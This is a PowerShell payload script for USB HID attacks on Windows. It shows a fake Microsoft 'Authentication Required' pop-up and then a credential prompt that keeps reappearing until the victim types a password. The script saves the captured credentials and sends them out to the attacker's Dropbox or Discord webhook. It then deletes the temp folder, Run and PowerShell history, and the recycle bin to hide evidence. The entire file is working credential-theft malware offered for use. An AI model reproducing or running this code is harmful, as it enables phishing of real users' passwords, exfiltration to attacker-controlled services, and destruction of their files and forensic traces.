1 | | - | ############################################################################################################################################################ |
2 | | - | # | ___ _ _ _ # ,d88b.d88b # |
3 | | - | # Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # |
4 | | - | # Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # |
5 | | - | # Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # |
6 | | - | # Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # |
7 | | - | # Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # |
8 | | - | # Mode : HID | |\__/,| (`\ # / -\ /- ~\ # |
9 | | - | # | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # |
10 | | - | # | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # |
11 | | - | # | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # |
12 | | - | #__________________________________|_________________________________________________________________________# | | ) ~ ( # |
13 | | - | # tiktok.com/@i_am_jakoby # / \ / ~ \ # |
14 | | - | # github.com/I-Am-Jakoby # \ / \~ ~/ # |
15 | | - | # twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# |
16 | | - | # instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# |
17 | | - | # youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# |
18 | | - | ############################################################################################################################################################ |
19 | | - | |
20 | | - | <# |
21 | | - | .SYNOPSIS |
22 | | - | This script is meant to trick your target into sharing their credentials through a fake authentication pop up message |
23 | | - | .DESCRIPTION |
24 | | - | A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" |
25 | | - | This will be followed by a fake authentication ui prompt. |
26 | | - | If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up |
27 | | - | Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection |
28 | | - | .Link |
29 | | - | https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads |
30 | | - | #> |
31 | | - | |
32 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
33 | | - | # This is for if you want to host your own version of the script |
34 | | - | |
35 | | - | # $db = "YOUR-DROPBOX-ACCESS-TOKEN" |
36 | | - | |
37 | | - | # $dc = "YOUR-DISCORD-WEBHOOK" |
38 | | - | |
39 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
40 | | - | |
41 | | - | $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" |
42 | | - | |
43 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
44 | | - | |
45 | | - | <# |
46 | | - | .NOTES |
47 | | - | This is to generate the ui.prompt you will use to harvest their credentials |
48 | | - | #> |
49 | | - | |
50 | | - | function Get-Creds { |
51 | | - | |
52 | | - | $form = $null |
53 | | - | |
54 | | - | while ($form -eq $null) |
55 | | - | { |
56 | | - | $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); |
57 | | - | $cred.getnetworkcredential().password |
58 | | - | |
59 | | - | if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) |
60 | | - | { |
61 | | - | [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") |
62 | | - | $form = $null |
63 | | - | } |
64 | | - | |
65 | | - | else{ |
66 | | - | $creds = $cred.GetNetworkCredential() | fl |
67 | | - | return $creds |
68 | | - | } |
69 | | - | } |
70 | | - | } |
71 | | - | |
72 | | - | #---------------------------------------------------------------------------------------------------- |
73 | | - | |
74 | | - | <# |
75 | | - | .NOTES |
76 | | - | This is to pause the script until a mouse movement is detected |
77 | | - | #> |
78 | | - | |
79 | | - | function Pause-Script{ |
80 | | - | Add-Type -AssemblyName System.Windows.Forms |
81 | | - | $originalPOS = [System.Windows.Forms.Cursor]::Position.X |
82 | | - | $o=New-Object -ComObject WScript.Shell |
83 | | - | |
84 | | - | while (1) { |
85 | | - | $pauseTime = 3 |
86 | | - | if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ |
87 | | - | break |
88 | | - | } |
89 | | - | else { |
90 | | - | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime |
91 | | - | } |
92 | | - | } |
93 | | - | } |
94 | | - | |
95 | | - | #---------------------------------------------------------------------------------------------------- |
96 | | - | |
97 | | - | # This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off |
98 | | - | |
99 | | - | function Caps-Off { |
100 | | - | Add-Type -AssemblyName System.Windows.Forms |
101 | | - | $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') |
102 | | - | |
103 | | - | #If true, toggle CapsLock key, to ensure that the script doesn't fail |
104 | | - | if ($caps -eq $true){ |
105 | | - | |
106 | | - | $key = New-Object -ComObject WScript.Shell |
107 | | - | $key.SendKeys('{CapsLock}') |
108 | | - | } |
109 | | - | } |
110 | | - | #---------------------------------------------------------------------------------------------------- |
111 | | - | |
112 | | - | <# |
113 | | - | .NOTES |
114 | | - | This is to call the function to pause the script until a mouse movement is detected then activate the pop-up |
115 | | - | #> |
116 | | - | |
117 | | - | Pause-Script |
118 | | - | |
119 | | - | Caps-Off |
120 | | - | |
121 | | - | Add-Type -AssemblyName PresentationCore,PresentationFramework |
122 | | - | $msgBody = "Please authenticate your Microsoft Account." |
123 | | - | $msgTitle = "Authentication Required" |
124 | | - | $msgButton = 'Ok' |
125 | | - | $msgImage = 'Warning' |
126 | | - | $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) |
127 | | - | Write-Host "The user clicked: $Result" |
128 | | - | |
129 | | - | $creds = Get-Creds |
130 | | - | |
131 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
132 | | - | |
133 | | - | <# |
134 | | - | .NOTES |
135 | | - | This is to save the gathered credentials to a file in the temp directory |
136 | | - | #> |
137 | | - | |
138 | | - | echo $creds >> $env:TMP\$FileName |
139 | | - | |
140 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
141 | | - | |
142 | | - | <# |
143 | | - | .NOTES |
144 | | - | This is to upload your files to dropbox |
145 | | - | #> |
146 | | - | |
147 | | - | function DropBox-Upload { |
148 | | - | |
149 | | - | [CmdletBinding()] |
150 | | - | param ( |
151 | | - | |
152 | | - | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] |
153 | | - | [Alias("f")] |
154 | | - | [string]$SourceFilePath |
155 | | - | ) |
156 | | - | $outputFile = Split-Path $SourceFilePath -leaf |
157 | | - | $TargetFilePath="/$outputFile" |
158 | | - | $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' |
159 | | - | $authorization = "Bearer " + $db |
160 | | - | $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" |
161 | | - | $headers.Add("Authorization", $authorization) |
162 | | - | $headers.Add("Dropbox-API-Arg", $arg) |
163 | | - | $headers.Add("Content-Type", 'application/octet-stream') |
164 | | - | Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers |
165 | | - | } |
166 | | - | |
167 | | - | if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} |
168 | | - | |
169 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
170 | | - | |
171 | | - | function Upload-Discord { |
172 | | - | |
173 | | - | [CmdletBinding()] |
174 | | - | param ( |
175 | | - | [parameter(Position=0,Mandatory=$False)] |
176 | | - | [string]$file, |
177 | | - | [parameter(Position=1,Mandatory=$False)] |
178 | | - | [string]$text |
179 | | - | ) |
180 | | - | |
181 | | - | $hookurl = "$dc" |
182 | | - | |
183 | | - | $Body = @{ |
184 | | - | 'username' = $env:username |
185 | | - | 'content' = $text |
186 | | - | } |
187 | | - | |
188 | | - | if (-not ([string]::IsNullOrEmpty($text))){ |
189 | | - | Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; |
190 | | - | |
191 | | - | if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} |
192 | | - | } |
193 | | - | |
194 | | - | if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} |
195 | | - | |
196 | | - | #------------------------------------------------------------------------------------------------------------------------------------ |
197 | | - | |
198 | | - | <# |
199 | | - | .NOTES |
200 | | - | This is to clean up behind you and remove any evidence to prove you were there |
201 | | - | #> |
202 | | - | |
203 | | - | # Delete contents of Temp folder |
204 | | - | |
205 | | - | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue |
206 | | - | |
207 | | - | # Delete run box history |
208 | | - | |
209 | | - | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f |
210 | | - | |
211 | | - | # Delete powershell history |
212 | | - | |
213 | | - | Remove-Item (Get-PSreadlineOption).HistorySavePath |
214 | | - | |
215 | | - | # Deletes contents of recycle bin |
216 | | - | |
217 | | - | Clear-RecycleBin -Force -ErrorAction SilentlyContinue |
218 | | - | |
219 | | - | exit |
220 | | - | |